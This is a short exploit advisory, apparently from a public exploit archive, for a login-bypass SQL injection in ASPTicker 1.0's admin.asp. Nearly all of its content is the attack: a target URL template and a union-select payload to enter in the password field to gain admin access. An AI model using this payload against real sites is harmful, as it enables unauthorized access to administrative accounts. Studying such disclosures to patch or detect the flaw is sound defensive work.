id: 1336
date: 12/28/2006
title: ASPTicker 1.0 (admin.asp) Login ByPass SQL Injection Vulnerability
author: ajann
cves: 

==================================================================
ASPTicker 1.0 (admin.asp) Login ByPass SQL Injection Vulnerability
==================================================================



*******************************************************************************
# Title   :  ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.aspapps.com
# $$      :  $ 17.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//admin.asp[ByPass]

Example:

//Password} 'union select 0,0,0 from password

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-21]  #